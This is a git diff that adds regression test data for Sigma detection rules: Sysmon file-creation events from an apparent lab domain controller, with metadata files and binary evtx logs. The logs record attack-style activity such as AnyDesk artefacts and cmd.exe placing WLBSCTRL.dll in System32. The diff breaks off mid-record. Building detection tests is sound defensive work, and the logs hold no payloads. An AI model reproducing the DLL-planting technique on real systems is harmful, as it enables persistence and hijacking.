b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json @@ -0,0 +1,255 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.640670Z" + } + }, + "EventRecordID": 14961, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.634", + "ProcessGuid": "5AA13A44-0D08-68FC-DC1D-000000004002", + "ProcessId": 7760, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\service.conf.new", + "CreationUtcTime": "2025-10-24 23:34:32.457", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.644616Z" + } + }, + "EventRecordID": 14963, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.634", + "ProcessGuid": "5AA13A44-0D08-68FC-DC1D-000000004002", + "ProcessId": 7760, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\service.conf~RF2d9c1fe.TMP", + "CreationUtcTime": "2025-10-24 23:34:34.634", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.649129Z" + } + }, + "EventRecordID": 14985, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.645", + "ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002", + "ProcessId": 9612, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf.new", + "CreationUtcTime": "2025-10-24 23:34:32.250", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.653476Z" + } + }, + "EventRecordID": 14988, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.645", + "ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002", + "ProcessId": 9612, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf~RF2d9c20d.TMP", + "CreationUtcTime": "2025-10-24 23:34:34.645", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.655191Z" + } + }, + "EventRecordID": 14990, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.645", + "ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002", + "ProcessId": 9612, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf.new", + "CreationUtcTime": "2025-10-24 23:34:32.250", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml new file mode 100644 index 000000000..b0fd7e356 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml @@ -0,0 +1,13 @@ +id: 0d7ff9a2-a55c-46c8-b878-4ec4ea8e91ae +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 0b9ad457-2554-44c1-82c2-d56a99c42377 + title: Anydesk Temporary Artefact +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx b/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx new file mode 100644 index 0000000000000000000000000000000000000000..a8f65532b756acb0dd8e513b401cbf1838e8c920 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json new file mode 100644 index 000000000..e1a6beffc --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:38:31.938519Z" + } + }, + "EventRecordID": 20972, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:38:31.936", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\Windows\\System32\\WLBSCTRL.dll", + "CreationUtcTime": "2025-10-24 23:38:31.936", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml new file mode 100644 index 000000000..9af8facb1 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml @@ -0,0 +1,13 @@ +id: 8da08693-5638-4236-87b1-d04b4fcc5e84 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: df6ecb8b-7822-4f4b-b412-08f524b4576c + title: Creation Of Non-Existent System DLL +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx new file mode 100644 index 0000000000000000000000000000000000000000..e758a71f3da007a4a90e8a7e9485289b156860c0 GIT binary patch literal 69632 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 S>jf=Bvtol28(ekU;Qj|%^u%HS literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json new file mode 100644 index 000000000..a169ce960 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:39:53.705006Z" + } + }, + "EventRecordID": 22566, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": 